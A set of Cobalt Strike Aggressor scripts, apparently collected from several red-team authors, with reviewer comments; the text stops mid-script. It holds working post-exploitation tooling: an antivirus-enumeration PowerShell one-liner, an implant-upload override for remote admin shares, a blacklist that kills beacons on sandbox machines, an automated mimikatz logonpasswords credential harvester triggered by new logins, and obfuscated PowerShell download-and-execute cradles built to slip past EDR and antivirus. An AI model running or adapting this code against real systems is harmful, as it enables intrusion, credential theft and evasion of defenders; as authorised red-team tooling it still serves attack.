#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
#
# What the one-liner does on the target (all of it runs inside the Beacon's PowerShell):
#  - looks for the vendor substrings in $av_list in the DisplayName of every entry under both
#    the 32-bit (Wow6432Node) and 64-bit HKLM Uninstall keys, and in the Path of every running
#    process (Get-Process);
#  - reads ASSignatureVersion from the Windows Defender "Signature Updates" key;
#  - prints two pipe-separated tables: PID|Name|Path and AV Name|Version|Install Date.
# NOTE(review): matching is a plain -match on the substring, so a product whose DisplayName or
# process path does not contain one of the listed words is silently missed; "Malware" is
# presumably meant to catch Malwarebytes — confirm.
# NOTE(review): the .ToString() calls on DisplayVersion / InstallDate are unguarded; an entry
# without those registry values will most likely error instead of being listed — confirm on a host
# where that happens.
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3";
#AV_Query Command Register
# Register AV_Query in the Beacon console's help; the text is one literal rather than a concatenation.
beacon_command_register("AV_Query", "Queries the Registry for AV Installed", "Syntax: AV_Query\nChecks HKLM hive for All AntiVirus installed");
#AV_Query alias
alias AV_Query {
    # $1 = bid. Two PowerShell round trips via powerpick (unmanaged PowerShell, no powershell.exe):
    # the registry/process sweep in $powershellcmd first, then the WMI Security Center view after a
    # 30 s pause so the two outputs do not interleave in the console.
    local('$securityCenterQuery');
    $securityCenterQuery = "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl";
    blog($1, "\cBDetermining what AntiVirus is installed...");
    bpowerpick!($1, $powershellcmd);
    bpause($1, int(30000));
    bpowerpick!($1, $securityCenterQuery);
}
#
# Handy alternative to the built-in 'upload' command: lets you upload a file to a specified
# remote path. By default, the built-in upload command drops the uploaded file into the Beacon's CWD;
# this script lets us override that behavior.
#
# -------------------------------------------
# beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
# [*] Tasked Beacon to upload file (size: 929.25KB) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
# [+] host called home, sent: 951655 bytes
#
# -------------------------------------------
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
#
# Replace the stock "upload" help entry with one that documents the optional remote path.
beacon_command_register("upload", "Upload a file to specified remote location.", "Use: upload </local/path/to/file> [/remote/path/to/file]\n\nUpload a file from local path (first argument) to remote path (second argument, optional).");
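# Render a byte count for the task log: "" for 0, "<n>B" below 1 KiB, otherwise the value scaled
# by 1024 and rounded to one decimal with a KB/MB/GB/TB/PB suffix.
# $1 = size in bytes (int, long or double).
# The original had one if-branch per unit and fell through to "" for anything at or above 1 TiB;
# it also built the TiB bound as 1024*1024*1024*1024, which only works if that product does not
# overflow the interpreter's int. Scaling in a loop avoids both.
sub interpretSize {
    local('$s $value @units $i');
    $s = $1;
    if ($s == 0) {
        return "";
    }
    if ($s < 1024) {
        return $s . "B";
    }
    @units = @("KB", "MB", "GB", "TB", "PB");
    $value = $s / 1024.0;
    $i = 0;
    while (($value >= 1024) && ($i < size(@units) - 1)) {
        $value = $value / 1024;
        $i++;
    }
    return round($value, 1) . @units[$i];
}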
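alias upload {
    # upload <local> [remote]
    #   no <local>  -> file chooser, stock bupload (file lands in the Beacon's cwd)
    #   no [remote] -> stock bupload with the given local file
    #   both        -> read the file here and send it with bupload_raw! to exactly [remote]
    # The remote path is used verbatim (UNC admin-share paths included) — that is the point of
    # the override, so no normalisation is attempted.
    local('$bid $f $localpath $remotepath $content');
    ($bid, $localpath, $remotepath) = @_;
    if ($localpath is $null || strlen($localpath) == 0) {
        prompt_file_open("Choose a file", $null, false, lambda({
            bupload($bid, $1);
        }, $bid => $bid));
        return;
    }
    # (The original repeated the empty-path check here; it could never fire.)
    if (!-exists $localpath) {
        berror($bid, "Specified input file does not exist: ( $+ $localpath $+ )");
        return;
    }
    if ($remotepath is $null || strlen($remotepath) == 0) {
        bupload($bid, $localpath);
        return;
    }
    try {
        $f = openf($localpath);
        $content = readb($f, -1);
        # Close before the empty check: the original threw with the handle still open.
        closef($f);
        if ($content is $null) {
            throw "Read empty file";
        }
    }
    catch $message {
        berror($bid, "Could not read contents of file to upload. Error: $message");
        return;
    }
    btask($bid, "Tasked Beacon to upload file (size: " . interpretSize(strlen($content)) . ") from: ( $+ $localpath $+ ) to: ( $+ $remotepath $+ )");
    bupload_raw!($bid, $remotepath, $content, $localpath);
}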
# Blacklist.cna
# Author: Vincent Yiu @vysecurity
# Not responsible for you losing shells, check the blacklists before using.
# Script-wide list of (user, computer) pairs that must never keep a Beacon: on beacon_initial a
# matching session is exited and removed. Edited at runtime by add_blacklist/remove_blacklist.
# NOTE(review): the entries below look like sandbox / analysis-VM fingerprints; the trailing " *"
# in the user field appears to be the literal value Beacon reports for that user (it is part of
# the string being compared, not a wildcard) — confirm before relying on it.
global('@blacklist');
#$blacklist_pc = @("JOHN-PC", "TEQUILABOOMBOOM", "ANTONY-PC", "XFIIP-PC", "HOME-OFF-D5F0AC");
#$blacklist_user = @();
$blacklist = @(
@("John *","JOHN-PC"),
@("janettdoe *","TEQUILABOOMBOOM"),
@("Antony *","ANTONY-PC"),
@("xfIIp *","XFIIP-PC"),
@("Dave *","HOME-OFF-D5F0AC")
);
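on beacon_initial {
    # $1 - ID of beacon
    # $2 - text of the message
    # $3 - time
    # Kill and forget any new Beacon whose (user, computer) pair is blacklisted.
    # The pair is compared field by field against each entry instead of testing a freshly built
    # array with isin, so the result does not depend on how the interpreter compares array values.
    local('$pcname $username @entry');
    $pcname = binfo($1, "computer");
    $username = binfo($1, "user");
    foreach @entry (@blacklist) {
        if ((@entry[0] eq $username) && (@entry[1] eq $pcname)) {
            # blog needs the bid as its first argument (the original passed only the text).
            blog($1, "[!] Blacklisted Pair: $username, $pcname");
            blog($1, "Exiting...");
            bexit($1);
            blog($1, "Removing...");
            bremove($1);
            return;
        }
    }
}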
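sub add_blacklist {
    # $1 = array of beacon ids (a popup selection, or the one-element array built by the alias).
    # Adds each Beacon's (user, computer) pair to @blacklist unless an identical pair is present,
    # then echoes the list to the last Beacon's console.
    local('$beacon $last $pair');
    foreach $beacon ($1) {
        $last = $beacon;
        $pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
        if (exists($pair)) {
            blog($beacon, "[!] $pair already exists in blacklist");
        }
        else {
            blog($beacon, "[*] Adding $pair to blacklist");
            add($blacklist, $pair, -1);
        }
    }
    # Nothing to echo to when the selection was empty.
    if ($last !is $null) {
        show_blacklist($last);
    }
}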
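sub remove_blacklist {
    # $1 = array of beacon ids. Drops each Beacon's (user, computer) pair from @blacklist.
    # Removal is by position after a field-by-field match, so it does not rely on remove()
    # recognising a freshly built pair as equal to the stored one.
    local('$beacon $last $pair $i');
    foreach $beacon ($1) {
        $last = $beacon;
        $pair = @(binfo($beacon, "user"), binfo($beacon, "computer"));
        if (exists($pair)) {
            blog($beacon, "[*] Removing $pair from blacklist");
            for ($i = size(@blacklist) - 1; $i >= 0; $i--) {
                if ((@blacklist[$i][0] eq $pair[0]) && (@blacklist[$i][1] eq $pair[1])) {
                    removeAt(@blacklist, $i);
                }
            }
        }
        else {
            blog($beacon, "[!] $pair does not exist in blacklist");
        }
    }
    if ($last !is $null) {
        show_blacklist($last);
    }
}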
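sub show_blacklist {
    # $1 = beacon id (or array of ids) whose console receives the listing.
    local('$pair');
    blog($1, "========================");
    # The original tested size($1) — the beacon id — rather than the list itself.
    if (size(@blacklist) == 0) {
        blog($1, "[!] Empty Blacklist");
    }
    foreach $pair (@blacklist) {
        blog($1, "Blacklist: $pair");
    }
    blog($1, "========================");
}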
# Right-click menu on the Beacon table; $1 is the array of selected beacon ids.
popup beacon_bottom {
    menu "Blacklist" {
        item "Add to Blacklist"      { add_blacklist($1); }
        item "Remove from Blacklist" { remove_blacklist($1); }
        item "Show Blacklist"        { show_blacklist($1); }
    }
}
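sub exists {
    # $1 = @("user", "computer"). Returns 1 when an identical pair is on @blacklist, $null otherwise
    # (callers only test truthiness). Fields are compared one by one so the answer does not depend on
    # how the interpreter compares two distinct array values — callers always pass a freshly built pair.
    local('@candidate @known');
    @candidate = $1;
    foreach @known (@blacklist) {
        if ((@known[0] eq @candidate[0]) && (@known[1] eq @candidate[1])) {
            return 1;
        }
    }
    return $null;
}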
alias blacklist-add {
    # $1 = bid; add_blacklist() expects a selection, so wrap the single id.
    local('@selection');
    @selection = @($1);
    add_blacklist(@selection);
}
alias blacklist-remove {
    # $1 = bid; remove_blacklist() expects a selection, so wrap the single id.
    local('@selection');
    @selection = @($1);
    remove_blacklist(@selection);
}
alias blacklist-show {
    # $1 = bid whose console gets the listing.
    local('$bid');
    $bid = $1;
    show_blacklist($bid);
}
#### Credpocalypse ####
## Monitor beacons and pick off users as they log in
## Author: Alyssa (ramen0x3f)
## Last Updated: 2017-08-14
## Description: ##
# Automate dumping passwords, so you don't miss new users logging in.
# Set the time interval (default 5m) and Credpocalypse will watch your
# beacons for new users in the running processes. If they aren't in the
# Credentials tab already, Credpocalypse will run logonpasswords.
# NOTE: Your beacon will only be interrupted if logonpasswords is run.
# There's no callback, so I can't smother the output. :-/
## Usage: ##
# Aliases (from a beacon)
# > begin_credpocalypse - watch current beacon
# > end_credpocalypse [all] - stop watching current/all beacon/s
# > credpocalypse_interval [time] - 1m, 5m (default), 10m, 30m, 60m
#
# Commands (from Script Console or ./agscript)
# > begin_credpocalypse - watches *all* beacons
# > end_credpocalypse - stop watching all beacons
# > credpocalypse_interval [time] - 1m, 5m (default), 10m, 30m, 60m
#
# Right click beacon(s) to get a pop up menu that lets you
# - Add to watchlist
# - Remove from watchlist
# - Change time interval that Credpocalypse checks watchlist
# - View the watchlist
######################################################################
## Register Aliases: ##
# Help entries for the three Beacon-console aliases (one literal per help text).
beacon_command_register("begin_credpocalypse", "Monitor beacons for new users and steal their passwords when they login", "Synopsis: begin_credpocalypse\n\nAdds current beacon to watchlist and routinely checks for new users. When a user is in the process list but not the Credentials tab, credpocalypse runs logonpasswords on that beacon.");
beacon_command_register("end_credpocalypse", "Stop monitoring beacons for new users", "Synopsis: end_credpocalypse [all]\n\nIf run without arguments, removes current beacon from watchlist. If 'all' is added, clears whole watchlist.");
beacon_command_register("credpocalypse_interval", "Change the interval time for Credpocalypse checks", "Synopsis: credpocalypse_interval [time]\n\nOptions: 1m, 5m (default), 10m, 30m, 60m. If no time supplied, default is used.");
# @captured_creds: "REALM\USER" (upper-cased) for every credential already in the model, rebuilt
#                  on each sweep; @watchlist: bids being polled; $interval: which heartbeat sweeps.
global('@captured_creds @watchlist $interval');
$interval = "5m";
#########
# UTILS #
#########
sub caps {
    # Upper-case a DOMAIN\user string one backslash-separated piece at a time and rejoin with "\".
    # (Per the original author, uc()/split() misbehave on the backslash itself.)
    local('$piece @upper');
    @upper = @();
    foreach $piece (split("\\\\", $1)) {
        push(@upper, uc($piece));
    }
    return join("\\", @upper);
}
sub change_interval {
    # Set the global $interval from $1 (case-insensitive); anything that is not one of the
    # supported values falls back to the 5-minute default.
    local('$wanted');
    $wanted = lc($1);
    if (($wanted eq "1m") || ($wanted eq "10m") || ($wanted eq "30m") || ($wanted eq "60m")) {
        $interval = $wanted;
    }
    else {
        $interval = "5m";
    }
}
sub get_users {
    # $1 = bid, $2 = callback invoked as [$2: $bid, $new_user_seen] once ps output arrives.
    # A "new user" is any non-empty 5th whitespace-separated column of the ps output that is not
    # "NT" (the first word of NT AUTHORITY\...) and is not already in @captured_creds.
    bps($1, lambda({
        local('$line $user $seen');
        $seen = false;
        foreach $line (split("\n", $2)) {
            ($null, $null, $null, $null, $user) = split("\\s+", $line);
            $user = caps($user);
            if ((strlen($user) == 0) || ($user eq "NT") || ($user in @captured_creds)) {
                continue;
            }
            $seen = true;
            break;
        }
        [$callback: $1, $seen];
    }, $callback => $2));
}
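sub steal_them_creds {
    # Called from the heartbeat handlers: rebuild @captured_creds from the Credentials tab, then
    # ask every watched Beacon for its process list and run logonpasswords where an unknown user
    # appears. Everything here is now local — the original leaked @pids, %cred and $bid as globals.
    # NOTE(review): logonpasswords (mimikatz) is launched automatically on every interval; each run
    # is a noisy, detectable action on the host, so keep the watchlist short and the interval sane.
    local('@pids %cred $bid');
    @pids = map({ return beacon_info($1, "pid"); }, @watchlist);
    println("Looking for new users in PIDs: " . join(", ", @pids));
    clear(@captured_creds);
    foreach %cred (credentials()) {
        push(@captured_creds, uc(%cred['realm']) . '\\' . uc(%cred['user']));
    }
    foreach $bid (@watchlist) {
        get_users($bid, {
            # $1 = bid, $2 = "new user seen" flag from get_users
            local('$stamp');
            if ($2) {
                $stamp = formatDate('yyyy-MM-dd HH:mm:ss z');
                btask($1, "[" . $stamp . "] New user! Running logonpasswords.");
                println("[" . $stamp . "] BID: " . $1 . " PID: " . beacon_info($1, "pid") . " New user! Running logonpasswords.");
                blogonpasswords($1);
            }
            else {
                println("No new users in BID: " . $1 . " PID: " . beacon_info($1, "pid"));
            }
        });
    }
}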
#####################
# Headless Commands #
#####################
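command begin_credpocalypse {
    # Script-console form: watch every Beacon the client knows about.
    # addAll() merges the id array element-wise; push() appends its argument as a single element,
    # which would have put the whole array on the watchlist as one entry (the "Begin..." menu item
    # below already uses addAll for the same job).
    addAll(@watchlist, beacon_ids());
    println("The Credpocalypse has begun... [dramatic music here]");
}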
# Script-console form: drop every watched Beacon. The heartbeat handlers do nothing on an empty list.
command end_credpocalypse {
clear(@watchlist);
}
command credpocalypse_interval {
    # Script-console form: $1 = requested interval; change_interval() validates and falls back to 5m.
    change_interval($1);
    println("Updated interval to $interval");
}
####################
# Menu and Aliases #
####################
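alias begin_credpocalypse {
    # $1 = current bid; $2 = optional other bid to watch instead.
    # Refuse duplicates: a bid listed twice would be polled (and logonpasswords'd) twice per sweep.
    local('$target');
    $target = iff($2, $2, $1);
    if ($target in @watchlist) {
        blog($1, "Beacon $target is already on the Credpocalypse wat" . "chlist.");
    }
    else {
        push(@watchlist, $target);
        blog($1, "Added $target to the Credpocalypse watchlist (interval: $interval $+ ).");
    }
}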
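alias end_credpocalypse {
    # end_credpocalypse       -> stop watching this Beacon ($1)
    # end_credpocalypse all   -> stop watching everything
    # The original used pop(@watchlist, $1); pop takes an element off the end of the array, so it
    # dropped whichever Beacon was added last, not the current one. remove() drops by value.
    if (lc($2) eq "all") {
        clear(@watchlist);
    }
    else {
        remove(@watchlist, $1);
    }
}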
alias credpocalypse_interval {
    # $1 = bid (for the console message), $2 = requested interval.
    change_interval($2);
    blog($1, "Updated interval to $interval");
}
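# Right-click menu; $1 is the array of selected beacon ids.
popup beacon_bottom {
    menu "Credpocalypse" {
        item "Begin..." {
            local('@pids');
            addAll(@watchlist, $1);
            @pids = map({ return beacon_info($1, "pid"); }, $1);
            show_message("Added to watchlist: " . join(", ", @pids));
        }
        item "End..." {
            local('@pids');
            removeAll(@watchlist, $1);
            @pids = map({ return beacon_info($1, "pid"); }, $1);
            show_message("Removed from watchlist: " . join(", ", @pids));
        }
        # All interval changes go through change_interval() so the menu, the alias and the
        # script-console command cannot drift apart.
        menu "Change Interval" {
            item "1 minute" {
                change_interval("1m");
                println("New interval: " . $interval);
            }
            item "5 minutes" {
                change_interval("5m");
                println("New interval: " . $interval);
            }
            item "10 minutes" {
                change_interval("10m");
                println("New interval: " . $interval);
            }
            item "30 minutes" {
                change_interval("30m");
                println("New interval: " . $interval);
            }
            item "1 hour" {
                change_interval("60m");
                println("New interval: " . $interval);
            }
        }
        item "View Watchlist" {
            local('$list $bid');
            $list = "Watched Beacons:\n============";
            foreach $bid (@watchlist) {
                $list .= "\n" . beacon_info($bid, "internal") . " (pid " . beacon_info($bid, "pid") . ")";
            }
            show_message($list);
        }
    }
}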
##########
# EVENTS #
##########
on heartbeat_1m {
    # Only the handler whose period matches $interval does the sweep.
    if (($interval eq "1m") && (size(@watchlist) > 0)) {
        steal_them_creds();
    }
}
on heartbeat_5m {
    # Only the handler whose period matches $interval does the sweep.
    if (($interval eq "5m") && (size(@watchlist) > 0)) {
        steal_them_creds();
    }
}
on heartbeat_10m {
    # Only the handler whose period matches $interval does the sweep.
    if (($interval eq "10m") && (size(@watchlist) > 0)) {
        steal_them_creds();
    }
}
on heartbeat_30m {
    # Only the handler whose period matches $interval does the sweep.
    if (($interval eq "30m") && (size(@watchlist) > 0)) {
        steal_them_creds();
    }
}
on heartbeat_60m {
    # Only the handler whose period matches $interval does the sweep.
    if (($interval eq "60m") && (size(@watchlist) > 0)) {
        steal_them_creds();
    }
}
#
# Custom Cobalt Strike Powershell Command & Download Cradles
#
# This script introduces several different methods for Powershell download and execution primitives, other
# than (Net.WebClient).DownloadString and IEX():
#
# set POWERSHELL_DOWNLOAD_CRADLE {
# return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
# }
# [...]
#
# set POWERSHELL_COMMAND {
# [...]
# return "powershell -nop -w hidden -encodedcommand $script";
# }
#
# The methods above are heavily flagged these days by EDRs and AVs, so we would prefer to avoid
# them. Cobalt Strike by default embeds them everywhere, generating a lot of noise in such systems.
# We can tell Cobalt Strike to structure its PowerShell usage differently. However, some of the
# custom methods introduced here may not work in every environment. In that case, switch back to the
# battle-tested Cobalt Strike defaults by setting $USE_UNSAFE_ENCODEDCOMMAND_AND_IEX to 2 (always).
#
# Watch Script Console for debug logs
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
# For OPSEC reasons we should avoid PowerShell's "-EncodedCommand" parameter and the "IEX()"
# (Invoke-Expression) cmdlet, as they are heavily flagged. Yet their use is very stable and proven
# to work across various environments and setups. This script can treat them as follows:
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 0; # Never use them
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 1; # Use them on a seldom occasion (randomly picked)
# USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2; # Always use them
# 0 = never emit -EncodedCommand / IEX, 1 = sometimes (random), 2 = always (stock Cobalt Strike).
global('$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX');
$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 0; # Never use them
# Set to true to see every generated cradle/command in the Script Console (they contain the full
# payload text, so leave it off unless you are debugging a primitive).
$DEBUG = false;
sub debug {
    # Script Console logging, gated on the file-level $DEBUG flag. $1 = message.
    if ($DEBUG) {
        println("[custom-powershell-hooks] $1");
    }
}
# Hook: build the "download this URL and run it" PowerShell snippet Cobalt Strike uses whenever it
# needs to stage a script ($1 = URL). A random (download, execution) pair is picked from the lists
# below; in mode 2 the stock IEX/DownloadString cradle is returned unchanged.
set POWERSHELL_DOWNLOAD_CRADLE {
local('$url $strategy $cradle @downloadPrimitives @executionPrimitives $download $execution $downloadPrimitive $executionPrimitive');
$url = $1;
# Each download primitive must download data from given ##URL## (that will be replaced later on)
# and put it into $u variable.
# Index 0 is the stock Cobalt Strike form; only $USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 1 can select it.
@downloadPrimitives = @(
# Unsafe (Net.WebClient).DownloadString
"\$u=(New-Object Net.Webclient).DownloadString('##URL##')",
# PowerShell 3.0+: Invoke-RestMethod
"\$u=('##URL##'|%{(IRM \$_)})",
# (Net.WebClient).DownloadString, with the method name resolved at runtime via the 'D*g' glob
"\$w=(New-Object Net.WebClient);\$u=\$w.((((\$w).PsObject.Methods)|?{(Item Variable:\_).Value.Name-clike'D*g'}).Name).Invoke('##URL##')",
# Net.WebRequest
"\$u=([IO.StreamReader]::new([Net.WebRequest]::Create('##URL##').GetResponse().GetResponseStream()).ReadToEnd())",
# Msxml2.XMLHTTP COM object
"\$c=New-Object -ComObject MsXml2.ServerXmlHttp;\$c.Open('GET','##URL##',0);\$c.Send();\$u=\$c.ResponseText"
);
# Use $u variable to obtain downloaded data.
# Index 0 is the plain IEX; the rest reach Invoke-Expression indirectly (alias glob, Get-Command
# glob, or characters picked out of a method's ToString()).
@executionPrimitives = @(
# Unsafe IEX()
"IEX(\$u)",
"&(DIR Alias:/I*X)(\$u)",
"\$u|&(DIR Alias:/I*X)",
"&(GCM I*e-E*)(\$u)",
"\$u|&(GCM I*e-E*)",
"&(''.SubString.ToString()[67,72,64]-Join'')(\$u)",
"\$u|&(''.SubString.ToString()[67,72,64]-Join'')"
);
if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 2) {
# Always-unsafe mode: the untouched Cobalt Strike default.
$cradle = "IEX (New-Object Net.Webclient).DownloadString(' $+ $url $+ ')";
}
else {
# Skip known bad combinations of above primitives.
# Known to not working (download - execution):
# * 3 - 3, 3 - 4
# Mode 1 draws from the whole lists (index 0 included); mode 0 draws from 1..n-1 only.
while(true) {
if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 1) {
$download = rand(size(@downloadPrimitives));
$execution = rand(size(@executionPrimitives));
}
else {
$download = rand(size(@downloadPrimitives) - 1) + 1;
$execution = rand(size(@executionPrimitives) - 1 ) + 1;
}
if ($download == 3 && ($execution >= 3 && $execution <= 4)) {
continue;
}
break;
}
# NOTE(review): the pair is re-rolled for every cradle, so a failure is not reproducible from the
# cradle text alone — keep $DEBUG on while validating a new primitive or a new target environment.
$downloadPrimitive = replace(@downloadPrimitives[$download], '##URL##', $url);
$executionPrimitive = @executionPrimitives[$execution];
$cradle = $downloadPrimitive . ";" . $executionPrimitive;
$cradle = replace($cradle, ";;", ";");
}
debug("hooked POWERSHELL_DOWNLOAD_CRADLE (download: $+ $download $+ ; execution: $+ $execution $+ ): $cradle");
return $cradle;
}
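# Hook: turn a PowerShell script ($1) into a powershell.exe command line. $2 is set for commands
# that run on a remote host (e.g. jump psexec_psh); those omit the execution-policy bypass, as the
# stock template does. Strategy 0 is the stock -EncodedCommand form; 1..3 are the custom ones.
# Fix: the original declared "$ley" instead of "$key" and never declared "$script", so both leaked
# into the global scope on every call.
set POWERSHELL_COMMAND {
    local('$strategy $key $enc $stub $cmd $script $prefix');
    $cmd = "";
    if ($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 1) {
        $strategy = rand(4);
    }
    else {
        $strategy = rand(3) + 1;
    }
    # Shared prefix for the three "-c" strategies.
    $prefix = iff($2, "powershell -nop -noni -w h -c", "powershell -nop -noni -ep bypass -w h -c");
    if (($USE_UNSAFE_ENCODEDCOMMAND_AND_IEX == 2) || ($strategy == 0)) {
        #
        # Default, built in and unsafe Cobalt Strike powershell command template.
        #
        $script = transform($1, "powershell-base64");
        if ($2) {
            $cmd = "powershell -nop -w hidden -encodedcommand $script";
        }
        else {
            $cmd = "powershell -nop -exec bypass -EncodedCommand $script";
        }
    }
    else if ($strategy == 1) {
        # Plain-text script inside a double-quoted -c argument.
        # NOTE(review): $1 is embedded verbatim, so a script that itself contains a double quote
        # breaks the command line; strategies 2/3 do not have that problem.
        $cmd = "$prefix \" $+ $1 $+ \"";
    }
    else if ($strategy == 2) {
        # Single-byte XOR of the script, shipped as a decimal byte array and undone in-line.
        $key = rand(254) + 1;
        $enc = replace(transform(str_xor($1, chr($key)), "array"), " ", "");
        $stub = "&([scriptblock]::Create((( $+ $enc $+ )|%{\$_-bxor $+ $key $+ }|%{[char]\$_})-join''))";
        $cmd = "$prefix \" $+ $stub $+ \"";
    }
    else if ($strategy == 3) {
        # Same XOR, but base64-wrapped; [Convert]::FromBase64String is looked up via the 'F*g' glob.
        $key = rand(254) + 1;
        $enc = base64_encode(str_xor($1, chr($key)));
        $stub = "\$t=([type]'Convert');&([scriptblock]::Create((\$t::((\$t.GetMethods()|?{\$_.Name-clike'F*g'}).Name)(' $+ $enc $+ ')|%{\$_-bxor $+ $key $+ }|%{[char]\$_})-join''))";
        $cmd = "$prefix \" $+ $stub $+ \"";
    }
    debug("hooked POWERSHELL_COMMAND (strategy: $strategy $+ ): $cmd");
    return $cmd;
}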
alias powershell2 {
    # powershell2 <command...>: run the rest of the line through "powershell -v 2". Everything after
    # the alias name is passed through untouched. Requesting the 2.0 engine will fail on hosts
    # where it is not installed.
    local('$rest');
    $rest = substr($0, strlen("powershell2 "));
    btask($1, "Tasked beacon to run powershell version 2 commands: $rest", "T1059");
    beacon_execute_job($1, "powershell", " -v 2 $rest", 0);
}
#
# Simple Beacon console status bar enhancement showing Beacon's last known current
# working directory path, as well as adding fixed-width to last-seen meter.
#
# Additionally, this script enhances 'cd' command to make it restore previous path
# if "cd -" was issued (and previous path is known).
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
# Per-Beacon state keyed by bid: 'cwd' (best guess at the current directory), 'prev-cwd' (for
# "cd -") and 'cwd-use-ls' (flag set while a bare "ls" is in flight, see the ls hooks below).
global('%OPERATING_BEACONS');
%OPERATING_BEACONS = %();
# Re-register "cd" so the help text mentions the "-" shortcut; the alias below does the work.
beacon_command_register(
"cd",
"Change directory on host. Use '-' to get back to previous cwd.",
"Use: cd [directory]\n\nChange directory on host. Use '-' to get back to previous cwd.");
# Left status bar: [host] user/pid (arch) cwd — the cwd comes from our own tracking table.
set BEACON_SBAR_LEFT {
    local('$host $user $pid $arch $cwd');
    $host = $2["computer"];
    $user = $2["user"];
    $pid  = $2["pid"];
    $arch = $2["arch"];
    $cwd  = %OPERATING_BEACONS[$1]['cwd'];
    return "[\c2" . $host . "\o] " . $user . "/" . $pid . " \cE(" . $arch . ")\o\c2 " . $cwd . " \o";
}
# Right status bar: the Beacon note plus a fixed-width (5 chars) last-seen value.
set BEACON_SBAR_RIGHT {
    local('$note $last');
    ($note, $last) = @($2["note"], $2["lastf"]);
    return "\c6 $note \cE(last: $+ $[5]last $+ )\o";
}
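on beacon_tasked {
    # Keep %OPERATING_BEACONS[$bid]['cwd'] in step with "cd" tasks so the status bar can show it.
    # $1 = bid, $2 = task text. This is a best-effort guess: "..\.." chains and drive-relative
    # "\foo" paths are not modelled; the BEACON_OUTPUT_ALT / ls hooks re-sync from real output.
    # Changes vs. the original: an absolute path is now also recognised as UNC ("\\host\share")
    # on Windows and as "/..." elsewhere (the old test treated "/tmp" as relative), and a relative
    # or ".." cd is ignored while the base directory is still unknown instead of producing a
    # path glued onto an empty string.
    local('$pwd $sep $cwd $cut $absolute');
    if ('cd *' iswm $2) {
        $pwd = substr($2, strlen("cd "));
        $sep = iff(binfo($1, "os") eq "Windows", "\\", "/");
        $cwd = %OPERATING_BEACONS[$1]['cwd'];
        if ($pwd eq ".") {
            return "\cC[*]\o $2";
        }
        else if ($pwd eq "..") {
            $cut = -1;
            if (strlen($cwd) > 0) {
                $cut = lindexOf($cwd, $sep);
            }
            if ($cut < 0) {
                return "\cC[*]\o $2";
            }
            # Cutting at position 0 means we are going up to the root itself.
            $pwd = iff($cut == 0, $sep, substr($cwd, 0, $cut));
        }
        else {
            $absolute = 0;
            if ($sep eq "\\") {
                if (((strlen($pwd) >= 2) && (charAt($pwd, 1) eq ":")) || (left($pwd, 2) eq "\\\\")) {
                    $absolute = 1;
                }
            }
            else if (left($pwd, 1) eq "/") {
                $absolute = 1;
            }
            if ($absolute == 0) {
                if (strlen($cwd) == 0) {
                    return "\cC[*]\o $2";
                }
                $pwd = $cwd . $sep . $pwd;
            }
        }
        %OPERATING_BEACONS[$1]['prev-cwd'] = $cwd;
        %OPERATING_BEACONS[$1]['cwd'] = $pwd;
        return "\cC[*]\o $2";
    }
}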
# Alternate-output hook: when Beacon reports "Current directory is X" (pwd / cd output), take X as
# the authoritative cwd and highlight it; everything else is passed through with the [*] prefix.
set BEACON_OUTPUT_ALT {
    local('$cwd');
    if ($2 ismatch 'Current directory is (.+)') {
        $cwd = matched()[0];
        %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd'];
        %OPERATING_BEACONS[$1]['cwd'] = $cwd;
        return "\cC[*]\o Current directory is \cC $+ $cwd $+ \o\n";
    }
    return "\cC[*]\o $2\n";
}
on beacon_input {
    # $1 = bid, $3 = text typed. Only a bare "ls" (no argument) lists the cwd, so only then may
    # the first line of the ls output be used as the current directory.
    local('$typed');
    $typed = ["$3" trim];
